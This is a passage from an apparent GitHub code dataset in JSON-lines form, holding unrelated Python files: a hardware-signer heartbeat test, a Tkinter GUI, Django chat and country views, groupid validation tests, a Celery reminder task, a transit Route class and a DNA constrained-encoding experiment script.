bytes.fromhex(h)\n h = int.from_bytes(h, byteorder=\"big\", signed=False)\n return h.to_bytes(32, byteorder=\"big\", signed=False)\n\n def get_message_part(msg, part):\n try:\n return ({\n \"best_block\": lambda m: m[self.EHL*2:(self.EHL+32)*2],\n \"last_tx\": lambda m: m[(self.EHL+32)*2:(self.EHL+32+8)*2],\n })[part](msg)\n except KeyError:\n raise TestCaseError(f\"Unknown message part \\\"{part}\\\"\")\n except Exception as e:\n raise TestCaseError(str(e))\n\n try:\n heartbeat = dongle.get_signer_heartbeat(self.ud_value)\n debug(f\"Heartbeat: {heartbeat}\")\n\n if not heartbeat[0]:\n error_code = heartbeat[1]\n raise TestCaseError(\"Expected success getting the heartbeat \"\n f\"but got error code {error_code}\")\n heartbeat = heartbeat[1]\n\n # Validate signature\n message = bytes.fromhex(heartbeat[\"message\"])\n pubkey = ec.PublicKey(bytes.fromhex(heartbeat[\"pubKey\"]), raw=True)\n norm_r = normalize_hex_sig_component(heartbeat[\"signature\"].r)\n norm_s = normalize_hex_sig_component(heartbeat[\"signature\"].s)\n sig = pubkey.ecdsa_deserialize_compact(norm_r + norm_s)\n tweak = hmac.new(\n bytes.fromhex(heartbeat[\"tweak\"]),\n pubkey.serialize(compressed=False),\n hashlib.sha256,\n ).digest()\n pubkey = pubkey.tweak_add(tweak)\n\n if not pubkey.ecdsa_verify(message, sig):\n raise TestCaseError(\"Expected signature to be valid but it wasn't\")\n\n # Validate header\n header_msg = message[:self.EHL].decode('ascii')\n if header_msg != self.EXPECTED_HEADER:\n raise TestCaseError(f\"Expected header to be {self.EXPECTED_HEADER} but\"\n f\" got {header_msg}\")\n\n # Validate UD value\n ud_msg = message[-16:].hex()\n if ud_msg != self.ud_value:\n raise TestCaseError(f\"Expected UD value to be {self.ud_value} but\"\n f\" got {ud_msg}\")\n\n # Expectations on the heartbeat message (optional)\n if type(self.expected) == dict:\n message = message.hex()\n for key in self.expected:\n val = get_message_part(message, key)\n if val != self.expected[key]:\n raise TestCaseError(f\"Expected {key} to be {self.expected[key]} \"\n f\"but got {val}\")\n except RuntimeError as e:\n raise TestCaseError(str(e))\n","repo_name":"rsksmart/rsk-powhsm","sub_path":"ledger/test/cases/heartbeat.py","file_name":"heartbeat.py","file_ext":"py","file_size_in_byte":3295,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"38"} +{"seq_id":"1832458488","text":"\r\n# Take n greater than 0.25 and less than 5\r\nsame=True\r\nn=0.3\r\n\r\n# Adding a background image\r\nbackground_image =Image.open(\"library.jpg\")\r\n[imageSizeWidth, imageSizeHeight] = background_image.size\r\n\r\nnewImageSizeWidth = int(imageSizeWidth*n)\r\nif same:\r\n newImageSizeHeight = int(imageSizeHeight*n) \r\nelse:\r\n newImageSizeHeight = int(imageSizeHeight/n) \r\n \r\nbackground_image = background_image.resize((newImageSizeWidth,newImageSizeHeight),Image.ANTIALIAS)\r\nimg = ImageTk.PhotoImage(background_image)\r\n\r\nCanvas1 = Canvas(root)\r\n\r\nCanvas1.create_image(300,340,image = img) \r\nCanvas1.config(bg=\"white\",width = newImageSizeWidth, height = newImageSizeHeight)\r\nCanvas1.pack(expand=True,fill=BOTH)\r\n\r\nheadingFrame1 = Frame(root,bg=\"#333945\",bd=5)\r\nheadingFrame1.place(relx=0.2,rely=0.1,relwidth=0.6,relheight=0.16)\r\n\r\nheadingFrame2 = Frame(headingFrame1,bg=\"#EAF0F1\")\r\nheadingFrame2.place(relx=0.01,rely=0.05,relwidth=0.98,relheight=0.9)\r\n\r\nheadingLabel = Label(headingFrame2, text=\"Welcome to RCPL Library\", fg='black')\r\nheadingLabel.place(relx=0.25,rely=0.1, relwidth=0.5, relheight=0.5)\r\n\r\nbtn1 = Button(root,text=\"Employee\",bg='black', fg='white', command=Employee)\r\nbtn1.place(relx=0.25,rely=0.3, relwidth=0.2,relheight=0.1)\r\n\r\nbtn2 = Button(root,text=\"Student\",bg='black', fg='white', command=Student)\r\nbtn2.place(relx=0.55,rely=0.3, relwidth=0.2,relheight=0.1)\r\n","repo_name":"rupalbohra/python","sub_path":"python assignment/timetable.py","file_name":"timetable.py","file_ext":"py","file_size_in_byte":1378,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"39063217804","text":"#!/usr/bin/env python\n# encoding: utf-8\n\n\n\"\"\"\n@author: aprilvkuo\n@license: Apache Licence \n@site: http://aprilvkuo.github.io\n@software: PyCharm Community Edition\n@file: 能源1.py\n@time: 2017/8/17 17:37\n\"\"\"\n\n\ndef func():\n while True:\n try:\n data = input().split(' ')\n x,y = int(data[0]),int(data[1])\n while x!=y:\n if x>y:\n x = x >> 1\n else:\n y = y >> 1\n print(x)\n except:\n return\n\n\n\n\nif __name__ == '__main__':\n func()","repo_name":"aprilvkuo/sword_for_offer","sub_path":"python/能源1.py","file_name":"能源1.py","file_ext":"py","file_size_in_byte":561,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"2080877295","text":"from django.db.models import Q\nfrom django.shortcuts import render\nfrom django.views import View\n\nfrom rest_framework.decorators import api_view, authentication_classes, permission_classes\nfrom rest_framework.response import Response\nfrom rest_framework import authentication, permissions\nfrom App.models import ChatRoom, PrivateMessage, Group, GroupMessages\nfrom App.serializers import ChatRoomSerializers, RoomMessageSerializers, HomeFeedSerializers, GroupMessageSerializer\nfrom rest_framework.views import APIView\nfrom rest_framework.generics import ListAPIView\nfrom user.models import User\n\nfrom collections import namedtuple\n\n\n\n@api_view(['GET', 'POST'])\ndef api_room_view(request):\n user = request.user\n rooms = ChatRoom.objects.filter(Q(user1=user) | Q(user2=user))\n instance = ChatRoomSerializers(rooms, many=True).data\n return Response(instance)\n\n\nclass RoomMessages(APIView):\n def get(self, request, *args, **kwargs):\n data = {}\n user2 = User.objects.get(username=kwargs['username'])\n room = ChatRoom.objects.filter(Q(user1=request.user, user2=user2) | Q(user2=request.user, user1=user2)).first()\n messages = PrivateMessage.manage.get_queryset(room=room)\n instance = RoomMessageSerializers(messages, context={\n 'request': request\n }, many=True).data\n # instance[\"unread\"] = 22\n return Response(instance)\n\n\n@api_view(['GET'])\ndef api_all_rooms(request):\n user = request.user\n all_rooms = namedtuple('RoomType', ['favourite_users', 'usersList', 'channelList'])\n rooms = all_rooms(\n favourite_users=[x for x in user.profile.favourite.all() if PrivateMessage.objects.filter(room=x)],\n usersList=[x for x in ChatRoom.objects.filter(Q(user1=user) | Q(user2=user))\n if x not in user.profile.favourite.all()],\n channelList=Group.objects.filter(members__participant=user)\n )\n instance = HomeFeedSerializers(rooms, context={\n \"request\": request\n }).data\n\n return Response(instance)\n\n\n@api_view(['GET', ])\ndef api_group_messages(request, group_id):\n group = Group.objects.get(id=group_id)\n messages = GroupMessages.manage.get_queryset(room=group)\n instance = GroupMessageSerializer(messages, many=True).data\n return Response(instance)\n","repo_name":"A1bdul/ChatApp","sub_path":"App/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2295,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"8824411392","text":"import pytest\n\nfrom h.util import group as group_util\n\n\nclass TestSplitGroupID:\n @pytest.mark.parametrize(\n \"groupid,authority_provided_id,authority\",\n [\n (\"group:flashbang@dingdong.com\", \"flashbang\", \"dingdong.com\"),\n (\"group:ffff@dingdong.com\", \"ffff\", \"dingdong.com\"),\n (\"group:.@dingdong.com\", \".\", \"dingdong.com\"),\n (\"group:group@yep.nope\", \"group\", \"yep.nope\"),\n (\"group:()@hi.co\", \"()\", \"hi.co\"),\n (\"group:!.~--_*'@hi.co\", \"!.~--_*'\", \"hi.co\"),\n ],\n )\n def test_it_splits_valid_groupids(self, groupid, authority_provided_id, authority):\n splitgroup = group_util.split_groupid(groupid)\n\n assert splitgroup[\"authority_provided_id\"] == authority_provided_id\n assert splitgroup[\"authority\"] == authority\n\n @pytest.mark.parametrize(\n \"groupid\",\n [\n \"groupp:whatnot@dingdong.co\",\n \"grou:whatnot@dingdong.co\",\n \"group:@dingdog.com\",\n \"group:@\",\n \"whatnot@dingdong.co\",\n \"group:@@dingdong.com\",\n \"group:\\\\f!orklift@sprongle.co\",\n \"group:another:@ding.com\",\n ],\n )\n def test_it_raises_ValueError_on_invalid_groupids(self, groupid):\n with pytest.raises(ValueError, match=\"valid groupid\"):\n group_util.split_groupid(groupid)\n\n\nclass TestIsGroupid:\n @pytest.mark.parametrize(\n \"maybe_groupid,result\",\n [\n (\"group:flashbang@dingdong.com\", True),\n (\"group::ffff@dingdong.com\", False),\n (\"group:\\\\f!orklift@sprongle.co\", False),\n (\"group:.@dingdong.com\", True),\n (\"group:group@yep.nope\", True),\n (\"group:()@hi.co\", True),\n (\"group:!.~--_*'@hi.co\", True),\n (\"groupp:whatnot@dingdong.co\", False),\n (\"grou:whatnot@dingdong.co\", False),\n (\"group:@dingdog.com\", False),\n (\"group:@\", False),\n (\"whatnot@dingdong.co\", False),\n (\"group:@@dingdong.com\", False),\n ],\n )\n def test_it_detects_groupid_validity(self, maybe_groupid, result):\n assert group_util.is_groupid(maybe_groupid) is result\n","repo_name":"hypothesis/h","sub_path":"tests/h/util/group_test.py","file_name":"group_test.py","file_ext":"py","file_size_in_byte":2208,"program_lang":"python","lang":"en","doc_type":"code","stars":2810,"dataset":"github-code","pt":"38"} +{"seq_id":"19167348509","text":"# tasks.py\n# tasks.py\nfrom celery import shared_task\nfrom django.utils import timezone\nfrom datetime import timedelta\nfrom django.core.mail import send_mail\nfrom .models import Document\n\n@shared_task\ndef send_document_reminder(user_email):\n user_documents = Document.objects.filter(car__user__email=user_email)\n \n # Calculate the date 1 month from now\n due_date_threshold = timezone.now() + timedelta(days=30)\n\n almost_due_documents = user_documents.filter(due_date__lte=due_date_threshold)\n\n for document in almost_due_documents:\n subject = f\"Reminder: Your document '{document.title}' is almost due\"\n message = f\"Your document '{document.title}' is almost due. Please take action.\"\n recipient_list = [user_email]\n\n send_mail(subject, message, \"your_email@example.com\", recipient_list)\n# tasks.py (update this file)\nfrom celery.schedules import crontab\n\nCELERY_BROKER_URL = 'redis://localhost:6379/0' # Update with your broker URL\n\nCELERY_BEAT_SCHEDULE = {\n 'send-document-reminder': {\n 'task': 'your_app.tasks.send_document_reminder',\n 'schedule': crontab(minute=0, hour=0), # Run every day at midnight\n },\n}\n","repo_name":"Luis-Huachaca-HV/CarConnect","sub_path":"car_project/cars/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":1179,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"34882949898","text":"\nCONSTRUCTION_KEYS = (\n 'construction',\n 'proposed',\n 'construction:railway',\n 'proposed:railway',\n)\n\nclass Route:\n def __init__(self, route_id, relation, city):\n \n self.city = city\n self.element = relation\n self.route_id = route_id\n \n self.type = relation['type']\n self.route = relation['route']\n self.name = relation['name']\n self.ref = relation.get('ref', None)\n self.operator = relation.get('operator', None)\n self.version = relation.get('public_transport:version', None)\n self.route_from = relation.get('from', None)\n self.route_to = relation.get('to', None)\n \n self.official_name = ''\n self.roundtrip = ''\n self.via = ''\n self.fee = ''\n self.charge = ''\n self.stops = []\n \n if self.version is None:\n city.warn('Public transport version is 1, which means the route is an unsorted pile of objects', relation)\n \n if self.ref is None:\n city.warn('Missing ref on a route', relation)\n\n if self.route_from is None:\n city.warn('Missing \"from\" on a route', relation)\n\n if self.route_to is None:\n city.warn('Missing \"to\" on a route', relation)\n\n def __len__(self):\n return len(self.stops)\n\n def __getitem__(self, i):\n return self.stops[i]\n\n def __iter__(self):\n return iter(self.stops)\n\n def __repr__(self):\n return (\n 'Route(id={}, type={}, ref={}, name={}, network={}, from={}, to={}'\n ).format(\n self.route_id,\n self.type,\n self.ref,\n self.name,\n self.operator,\n self.route_from,\n self.route_to,\n )\n \n @staticmethod\n def is_route(el, modes):\n if el['type'] != 'relation' or el.get('tags', {}).get('type') != 'route':\n return False\n if 'members' not in el:\n return False\n if el['tags'].get('route') not in modes:\n return False\n for k in CONSTRUCTION_KEYS:\n if k in el['tags']:\n return False\n if 'ref' not in el['tags'] and 'name' not in el['tags']:\n return False\n return True\n\nclass RouteMaster:\n def __init__(self, ref, relation, city):\n self.relation = relation\n self.city = city\n\n self.ref = ref\n self.name = ''\n self.official_name = ''\n self.routes = []\n\n def __repr__(self):\n text = 'RouteMaster(ref={}, count={})'.format(self.ref, len(self.routes))\n for r in self.routes:\n text = text + '\\n\\t' + str(r)\n \n return text\n ","repo_name":"anodern/bus-validation","sub_path":"route.py","file_name":"route.py","file_ext":"py","file_size_in_byte":2725,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"32904470877","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Mar 31 11:26:38 2022\n\n@author: omers\n\"\"\"\nimport os\nimport sys\nprojectDir = os.environ.get('EUCLID')\nif projectDir == None:\n projectDir = \"D:/Euclid/\"\nsys.path.insert(1, projectDir)\nfrom produceEuclidEncoding import *\nfrom analysisFunctions import windowedGCcontent, gcVariance\nimport matplotlib.pyplot as plt\nimport mapping\nimport produceEuclidEncoding\nimport convolutional\nimport scipy.io\nimport numpy as np\nimport binaryToDna\n\nEXAMPLE_SEQUENCE = 'TTTTTCGATTTTTGACCACGAAACCACCCTGACGGCCGCGAAAAAAAACATCCATCAAAAAGGGAAAAAAAAAAAAAAGAAAAAAAGGAAACAATTAAAAAAAGAAAAAAAAAAAAAACTAAAAAAAAAAAAGACGAAACACAAAAAAAAAGAAAAAAAAAAAAAAGTAAAAAAAAAAAAGATGAAACACGGAAAAAACCAAAAAAAAAAAAAAACAAAAAAAAAAAAGCGGAAACACGTAAAAAACCAAAAAAAAAAAAAAACAA'\n\nEXAMPLE_HOMOPOLYMER = 'A' * 266\n\nEXAMPLE_HOMOPOLYMERS = 'A' * 66 + 'C' * 66 + 'T' * 66 + 'G' * 66 + 'ACTG'\n\nEXAMPLE_STR1 = 'ACTG' * 133\n\ndef saveFSM(states, triggers, transitionDictionary, path = projectDir, fileName = 'example'):\n workspaceDict = {}\n workspaceDict['states'] = states\n workspaceDict['triggers'] = triggers\n workspaceDict['transitionDictionary'] = transitionDictionary\n fileNameWithPath = path + \"/\" + fileName + '.mat'\n scipy.io.savemat(fileNameWithPath, workspaceDict)\n return fileNameWithPath\n \ndef encodeUsingExampleFromFile(fileName, sequence):\n workspaceDict = np.load(fileName, allow_pickle = 'TRUE').item()\n #outputDictionary = workspaceDict['outputDictionary']\n outputFSM = workspaceDict['outputFSM']\n verticalSymbols = workspaceDict['vsym']\n horizontalSymbols = workspaceDict['hsym']\n triggerLength = len(horizontalSymbols[0])\n status, binaryTextLine, binaryLineNumerical = mapping.dnaToBinary(sequence)\n nucStream = mapping.binaryStreamToBases(binaryTextLine)\n symbolSize = len(verticalSymbols[0]) // 2\n print(symbolSize)\n initialState = '0'*2*symbolSize\n euclidFSM = convolutional.makeEuclidFSM(verticalSymbols, horizontalSymbols, outputFSM, initialState)\n if (len(binaryTextLine) % triggerLength) != 0:\n padding = '0' * (triggerLength - (len(binaryTextLine) % triggerLength))\n binaryTextLine = binaryTextLine + padding\n encodedStream = convolutional.FSMdictionaryEncoder(binaryTextLine, euclidFSM)\n \n flatStream = ''\n for sublist in encodedStream:\n flatStream = flatStream + sublist\n encodedNucStream = mapping.binaryStreamToBases(flatStream)\n return encodedNucStream\n \ndef dissertationExample1(windowSize = 20, symbolSize = 5, mechanism = trackGClevel, uncodedSequence = None, fileName = \"example\", gcMin = 0.25, gcMax = 0.75, runLength = 10):\n workspaceDict = {}\n \n example1ConstraintList = {'gcMin': gcMin, 'gcMax': gcMax, 'runLength': runLength}#,\n workspaceDict['constraintList'] = example1ConstraintList\n c, cd, vsym, hsym = euclidCandidates(constraintList = example1ConstraintList, symbolSize = symbolSize) \n \n #numberOfPossibleCandidatesCountMatrix, outputDictionary, outputFSM, verticalSymbols, horizontalSymbols = makeFSM(c, vsym, hsym, minimiseReservedValue)\n numberOfPossibleCandidatesCountMatrix, outputDictionary, outputFSM, verticalSymbols, horizontalSymbols = makeFSM(c, vsym, hsym, mechanism)\n \n triggerLength = len(horizontalSymbols[0])\n if uncodedSequence == None:\n uncodedSequence = EXAMPLE_SEQUENCE\n\n status, binaryTextLine, binaryLineNumerical = mapping.dnaToBinary(uncodedSequence)\n nucStream = mapping.binaryStreamToBases(binaryTextLine)\n \n #print(nucStream == mapping.binaryStreamToBases(binaryTextLine))\n initialState = '0'*2*symbolSize\n euclidFSM = convolutional.makeEuclidFSM(verticalSymbols, horizontalSymbols, outputFSM, initialState)\n if (len(binaryTextLine) % triggerLength) != 0:\n padding = '0' * (triggerLength - (len(binaryTextLine) % triggerLength))\n binaryTextLine = binaryTextLine + padding\n encodedStream = convolutional.FSMdictionaryEncoder(binaryTextLine, euclidFSM)\n \n flatStream = ''\n for sublist in encodedStream:\n flatStream = flatStream + sublist\n encodedNucStream = mapping.binaryStreamToBases(flatStream)\n\n \n \n fig, ax = plt.subplots()\n status, slidingPointsSource, gcContentSource, GC, AT, other = windowedGCcontent(uncodedSequence, windowSize)\n txt = 'Source sequence, window size ' +str(windowSize)\n ax.plot(slidingPointsSource, gcContentSource, linewidth=2.0, label = txt)\n status, slidingPointsEncoded1, gcContentEncoded1, GC, AT, other = windowedGCcontent(encodedNucStream, windowSize)\n txt = 'Encoded, window size ' +str(windowSize)\n ax.plot(slidingPointsEncoded1, gcContentEncoded1, linewidth=2.0, label = txt)\n ax.set(ylim=(0, 1))\n ax.grid(True)\n ax.set_xlabel(\"Index of window start position. Window size = \" + str(windowSize) + \"bases\", size = 24)\n ax.set_ylabel(\"GC content normalised\", size = 24)\n ax.set_title('GC content calculated on a sliding windows', size = 24)\n ax.tick_params(axis = 'both', which = 'major', labelsize = 24)\n ax.vlines(slidingPointsSource[-1], 0, 1, colors = 'red', linewidth = 2.5, linestyle = '--')\n ax.vlines(slidingPointsEncoded1[-1], 0, 1, colors = 'red', linewidth = 2.5, linestyle = '--')\n averageGCSourceTxt = \"Average sliding window GC content \" + str(np.average(gcContentSource))\n ax.hlines(np.average(gcContentSource), slidingPointsSource[0], slidingPointsSource[-1], colors = 'red', linestyle = '-', linewidth = 2.0, label = averageGCSourceTxt)\n #ax.hlines(np.average(gcContentSource), slidingPointsSource[0], slidingPointsSource[-1], colors = 'red', linestyle = '-', linewidth = 2.0)\n averageGCEncodedTxt = \"Average sliding window GC content \" + str(np.average(gcContentEncoded1))\n ax.hlines(np.average(gcContentEncoded1), slidingPointsEncoded1[0], slidingPointsEncoded1[-1], colors = 'green', linestyle = '-', linewidth = 2.0, label = averageGCEncodedTxt)\n #ax.hlines(max(gcContentEncoded1), slidingPointsEncoded1[0], slidingPointsEncoded1[-1], colors = 'red', linestyle = '-', linewidth = 2.0)\n plt.legend(fontsize = 24)\n \n workspaceDict['symbolSize'] = symbolSize\n workspaceDict['mechanism'] = str(mechanism)\n workspaceDict['gcMin'] = gcMin\n workspaceDict['gcMax'] = gcMax\n workspaceDict['runLength'] = runLength\n workspaceDict['constraintList'] = example1ConstraintList\n workspaceDict['c'] = c\n workspaceDict['cd'] = cd\n workspaceDict['vsym'] = vsym\n workspaceDict['hsym'] = hsym\n workspaceDict['uncodedSequence'] = uncodedSequence\n workspaceDict['binaryTextLine'] = binaryTextLine\n workspaceDict['binaryLineNumerical'] = binaryLineNumerical\n workspaceDict['nucStream'] = nucStream\n workspaceDict['encodedStream'] = encodedStream\n workspaceDict['encodedNucStream'] = encodedNucStream\n workspaceDict['outputDictionary'] = outputDictionary\n workspaceDict['outputFSM'] = outputFSM\n fileNameWithPath = projectDir + \"/\" + fileName\n scipy.io.savemat(fileNameWithPath + '.mat', workspaceDict)\n np.save(fileNameWithPath + '.npy', workspaceDict)\n #plt.show()\n plt.tight_layout()\n figureFileNameWithPath = projectDir + \"/\" + fileName + '.png'\n plt.savefig(fname = figureFileNameWithPath)\n return numberOfPossibleCandidatesCountMatrix, outputDictionary, outputFSM, verticalSymbols, horizontalSymbols, encodedNucStream\n\ndef openVirusFile(filePath):\n # Function assumes a path to a txt file that contains DNA, possibly with newline breaks \\n, possibly with spaces \" \" and possibly lowercase letters.\n # No safety provided (so if you have line numbers for example, remove them)\n dna = ''\n with open(filePath, \"r\") as virusFile:\n for newLine in virusFile:\n lineList = virusFile.readline()\n lineList = lineList.split(\" \")\n 'print(lineList)'\n #line = line.strip(\" \")\n #print(line)\n line = ''\n for word in lineList:\n temp = word.strip('\\n')\n line = line + temp.upper()\n dna = dna + line\n return dna\n\n\n\ndef graphicsForExamples(slidingPoints, gcContent, windowSize, fileName, title = None):\n fig, ax = plt.subplots()\n txt = 'Source sequence, window size ' +str(windowSize)\n ax.plot(slidingPoints, gcContent, linewidth=2.0, label = txt)\n ax.set(ylim=(0, 1))\n ax.grid(True)\n ax.set_xlabel(\"Index of window start position. Window size = \" + str(windowSize) + \"bases\", size = 24)\n ax.set_ylabel(\"GC content normalised\", size = 24)\n if title == None:\n title = 'GC content calculated on a sliding windows'\n ax.set_title(title, size = 24)\n ax.tick_params(axis = 'both', which = 'major', labelsize = 24)\n #ax.vlines(slidingPointsSource[-1], 0, 1, colors = 'red', linewidth = 2.5, linestyle = '--')\n #ax.vlines(slidingPointsEncoded1[-1], 0, 1, colors = 'red', linewidth = 2.5, linestyle = '--')\n averageGCSourceTxt = \"Average sliding window GC content \" + str(np.average(gcContent))\n ax.hlines(np.average(gcContent), slidingPoints[0], slidingPoints[-1], colors = 'red', linestyle = '-', linewidth = 2.0, label = averageGCSourceTxt)\n #ax.hlines(np.average(gcContentSource), slidingPointsSource[0], slidingPointsSource[-1], colors = 'red', linestyle = '-', linewidth = 2.0)\n #averageGCEncodedTxt = \"Average sliding window GC content \" + str(np.average(gcContentEncoded1))\n #ax.hlines(np.average(gcContentEncoded1), slidingPointsEncoded1[0], slidingPointsEncoded1[-1], colors = 'red', linestyle = '-', linewidth = 2.0, label = averageGCEncodedTxt)\n #ax.hlines(max(gcContentEncoded1), slidingPointsEncoded1[0], slidingPointsEncoded1[-1], colors = 'red', linestyle = '-', linewidth = 2.0)\n plt.legend(fontsize = 24)\n plt.tight_layout()\n figureFileNameWithPath = projectDir + \"/\" + fileName + '.png'\n plt.savefig(fname = figureFileNameWithPath) \n\ndef produceGraphicsForMethodology(sequence = None):\n if sequence == None:\n sequence = EXAMPLE_SEQUENCE\n subSequences, occurences = binaryToDna.produceStatsFromSequence(sequence)\n binaryToDna.subSequenceGraphics(subSequences[0:4], occurences[0:4])\n binaryToDna.subSequenceGraphics(subSequences[0:20], occurences[0:20])\n binaryToDna.subSequenceGraphics(subSequences, occurences)\n return\n \n \n \ndef openExample(filePath):\n workSpaceDictionary = np.load(filePath ,allow_pickle='TRUE').item()#scipy.io.loadmat(filePath)\n uncodedStream = (workSpaceDictionary['uncodedSequence'])[0]\n encodedStream = (workSpaceDictionary['encodedNucStream'])[0]\n gcVariance(encodedStream, 50)\n varianceArray, slidingPoints, gcContent, argMaxGCCOntent, argMinGCContent = gcVariance(encodedStream, 50)\n return workSpaceDictionary, uncodedStream, encodedStream, varianceArray, slidingPoints, gcContent, argMaxGCCOntent, argMinGCContent\n #return\n \ndef getLanguage(outputFSM):\n language = []\n for verticalSymbol in outputFSM.keys():\n for trigger in outputFSM[verticalSymbol].keys():\n language.append(outputFSM[verticalSymbol][trigger])\n languageUnique, counts = np.unique(language, return_counts = True)\n return language, languageUnique, counts\n\n\ndef dissertationGraphicsForLanguageDiversity(fileName1, fileName2, title1 = \"G-C Tracking\", title2 = \"Random\"):\n \n workSpaceDictionary1 = np.load(fileName1 ,allow_pickle='TRUE').item()\n workSpaceDictionary2 = np.load(fileName2 ,allow_pickle='TRUE').item()\n FSM1 = workSpaceDictionary1['outputFSM']\n FSM2 = workSpaceDictionary2['outputFSM']\n barWidth = 0.35 \n \n \n language1, languageUnique1, gcCounts1 = getLanguage(FSM1)\n language2, languageUnique2, gcCounts2 = getLanguage(FSM2)\n print(len(language1))\n print(len(languageUnique1))\n print(len(language2))\n print(len(languageUnique2))\n fig, ax = plt.subplots()\n bar1 = ax.bar(np.arange(0, len(languageUnique1)), gcCounts1, width = barWidth, align='center', label = title1, tick_label = None)#languageUnique1\n bar2 = ax.bar(np.arange(0, len(languageUnique2)) + barWidth, gcCounts2, width = barWidth, align='center', label = title2, tick_label = None)#languageUnique2\n ax.set_title(\"Output diversity of \" + title1 + \" vs \" + title2, size = 24)\n ax.set_xlabel(\"Possible output symbols\", size = 24)\n ax.set_ylabel(\"Occurences\", size = 24)\n #ax.tick_params(axis='x', Labelsize = 24)\n #ax.tick_params(axis='y', Labelsize = 24)\n plt.yticks(fontsize = 24)\n #plt.xticks(rotation=90, fontsize = 10)\n plt.xticks(fontsize = 24)\n plt.legend(fontsize = 24)\n fig.show()\n \n # workSpaceDictionary = np.load(\"D:/Euclid/random7134066SymbolSize4.npy\" ,allow_pickle='TRUE').item()\n # randomOutputFSM4 = workSpaceDictionary['outputFSM']\n # workSpaceDictionary = np.load(\"D:/Euclid/random7134066SymbolSize5.npy\" ,allow_pickle='TRUE').item()\n # randomOutputFSM5 = workSpaceDictionary['outputFSM']\n # workSpaceDictionary = np.load(\"D:/Euclid/random7134066SymbolSize6.npy\" ,allow_pickle='TRUE').item()\n # randomOutputFSM6 = workSpaceDictionary['outputFSM']\n \n # workSpaceDictionary = np.load(\"D:/Euclid/gcTrackingSymbolSize4.npy\" ,allow_pickle='TRUE').item()\n # gcTrackingOutputFSM4 = workSpaceDictionary['outputFSM']\n # workSpaceDictionary = np.load(\"D:/Euclid/gcTrackingSymbolSize5.npy\" ,allow_pickle='TRUE').item()\n # gcTrackingOutputFSM5 = workSpaceDictionary['outputFSM']\n # workSpaceDictionary = np.load(\"D:/Euclid/gcTrackingSymbolSize6.npy\" ,allow_pickle='TRUE').item()\n # gcTrackingOutputFSM6 = workSpaceDictionary['outputFSM']\n \n \n #ax.xticks(range(len(errorRateListOfFast)),('[10-20)', '[20-30)', '[30-50)', '[50-70)','[70-90)', '[90-120)', ' [120 < )'), rotation=30)\n \n # fig5, ax5 = plt.subplots()\n # langRandom5, langRandomUnique5, randomCounts5 = getLanguage(randomOutputFSM5)\n # gcLang5, gcLangUnique5, gcCounts5 = getLanguage(gcTrackingOutputFSM5)\n \n # fig6, ax6 = plt.subplots()\n # langRandom6, langRandomUnique6, randomCounts6 = getLanguage(randomOutputFSM6)\n # gcLang6, gcLangUnique6, gcCounts6 = getLanguage(gcTrackingOutputFSM6)\n\nif __name__ == '__main__':\n pass\n # projectDir = os.environ.get('EUCLID')\n # if projectDir == None:\n # sys.path.insert(1, projectDir)\n # import argparse\n # import os\n # from produceEuclidEncoding import trackGClevel, completelyRandom\n # # Omer Sella: this is critical - we are setting forking to spawn, otherwise utilisation of multiple GPUs doesn't work properly\n # #multiprocessing.set_start_method('spawn')\n # parser = argparse.ArgumentParser()\n # parser.add_argument('--sequence', type=str, default= 'EXAMPLE_HOMOPOLYMERS')\n # #parser.add_argument('--resetType', type=str, default= 'WORST_CODES')\n # parser.add_argument('--mechanism', type=str, default= 'gcTracking')\n # parser.add_argument('--fileName', type=str, default='example')\n # parser.add_argument('--windowSize', type=int, default=20)\n # parser.add_argument('--symbolSize', type=int, default=5)\n # parser.add_argument('--gcMin', type=float, default=0.25)\n # parser.add_argument('--gcMax', type=float, default=0.65)\n # parser.add_argument('--runLength', type=int, default=10)\n # parser.add_argument('--seed', type=int, default= 117)\n \n \n # args = parser.parse_args()\n \n # if args.mechanism == 'gcTracking':\n # mech = trackGClevel\n # elif args.mechanism == 'random':\n # mech = completelyRandom\n # else:\n # mech = completelyRandom\n # if args.sequence == 'EXAMPLE_HOMOPOLYMERS':\n # seq = EXAMPLE_HOMOPOLYMERS\n # elif args.sequence == 'EXAMPLE_HOMOPOLYMER':\n # seq = EXAMPLE_HOMOPOLYMER\n # else:\n # seq = args.sequence\n # encodedNucStream = dissertationExample1(windowSize = args.windowSize, symbolSize = args.symbolSize, mechanism = mech, uncodedSequence = seq, fileName = args.fileName, gcMin = args.gcMin, gcMax = args.gcMax, runLength = args.runLength)\n #return encodedNucStream","repo_name":"Omer-Sella/Euclid","sub_path":"examples.py","file_name":"examples.py","file_ext":"py","file_size_in_byte":16000,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"73914407151","text":"from django.contrib import messages\nfrom django.http import JsonResponse\nfrom django.urls import reverse_lazy\nfrom django.views import View\nfrom django.views.generic import ListView, CreateView, UpdateView, TemplateView\nfrom core.utiles.permission_required import PermissionRequiredMixin\nfrom nomencladores.forms.form_pais import PaisForm\nfrom nomencladores.models.pais import Pais\n\n\nclass ListadoPaisesView(PermissionRequiredMixin, ListView):\n model = Pais\n template_name = 'pais/listado_paises.html'\n paginate_by = 10\n permission = 'nomencladores.view_pais'\n\n def get_queryset(self):\n paises = Pais.objects.all().order_by('nombre')\n\n q = self.request.GET.get('q')\n if q is not None and q != \"\":\n paises = paises.filter(nombre__icontains=q)\n\n return paises\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['titulo'] = 'Listado de países'\n context['activar_nomencladores'] = True\n context['path'] = [\n {'name': 'Nomencladores'},\n {'name': 'Países', 'href': reverse_lazy('paises')}\n ]\n return context\n\n\nclass RegistrarPaisView(PermissionRequiredMixin, CreateView):\n model = Pais\n template_name = \"pais/pais_form.html\"\n form_class = PaisForm\n success_url = reverse_lazy('paises')\n permission = 'nomencladores.add_pais'\n\n def 